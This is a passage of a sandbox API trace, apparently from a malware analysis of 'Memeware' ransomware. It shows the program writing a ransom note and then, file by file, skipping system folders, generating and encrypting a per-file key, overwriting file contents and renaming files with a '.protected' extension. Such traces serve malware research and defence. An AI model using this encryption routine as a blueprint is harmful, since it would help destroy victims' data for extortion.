(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.173] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.173] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.173] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.174] CloseHandle (hObject=0x154) returned 1 [0078.174] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="Windows") returned -1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="Program Files") returned -1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="Program Files (x86)") returned -1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="$Recycle.bin") returned 1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="System Volume Information") returned -1 [0078.174] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests") returned 92 [0078.174] lstrcmpW (lpString1="manifests", lpString2=".") returned 1 [0078.174] lstrcmpW (lpString1="manifests", lpString2="..") returned 1 [0078.174] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*") returned 94 [0078.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.176] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.176] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.176] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.176] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.176] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\.") returned 94 [0078.176] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.176] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.176] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.176] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.176] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.176] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.176] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.176] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\..") returned 95 [0078.176] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.176] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.176] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="Windows") returned -1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="Program Files") returned -1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="Program Files (x86)") returned -1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="$Recycle.bin") returned 1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="System Volume Information") returned -1 [0078.176] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0078.176] StrStrIW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".protected") returned 0x0 [0078.176] lstrcmpW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="RESTORE_FILES.txt") returned -1 [0078.176] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.177] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.177] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0078.177] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".txt") returned 0x0 [0078.177] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0078.177] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".rar") returned 0x0 [0078.177] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0078.177] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".zip") returned 0x0 [0078.177] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.177] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.177] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.178] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.178] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.178] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.178] CloseHandle (hObject=0x158) returned 1 [0078.178] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.protected") returned 169 [0078.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.protected")) returned 1 [0078.179] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="Windows") returned -1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="Program Files") returned -1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="Program Files (x86)") returned -1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="$Recycle.bin") returned 1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="System Volume Information") returned -1 [0078.179] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0078.179] StrStrIW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".protected") returned 0x0 [0078.179] lstrcmpW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0078.179] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.179] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0078.179] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".txt") returned 0x0 [0078.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0078.179] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".rar") returned 0x0 [0078.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0078.179] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".zip") returned 0x0 [0078.179] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.180] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.180] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.180] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.180] CloseHandle (hObject=0x158) returned 1 [0078.180] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.protected") returned 171 [0078.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.protected")) returned 1 [0078.181] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="Windows") returned -1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="Program Files") returned -1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="Program Files (x86)") returned -1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="$Recycle.bin") returned 1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="System Volume Information") returned -1 [0078.181] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0078.181] StrStrIW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".protected") returned 0x0 [0078.181] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="RESTORE_FILES.txt") returned -1 [0078.181] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.181] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0078.182] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".txt") returned 0x0 [0078.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0078.182] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".rar") returned 0x0 [0078.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0078.182] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".zip") returned 0x0 [0078.182] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.184] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.184] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.184] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.184] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.184] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.185] CloseHandle (hObject=0x158) returned 1 [0078.185] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.protected") returned 169 [0078.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.protected")) returned 1 [0078.186] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="Windows") returned -1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="Program Files") returned -1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="Program Files (x86)") returned -1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="$Recycle.bin") returned 1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="System Volume Information") returned -1 [0078.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0078.186] StrStrIW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpSrch=".protected") returned 0x0 [0078.186] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0078.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0078.186] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", 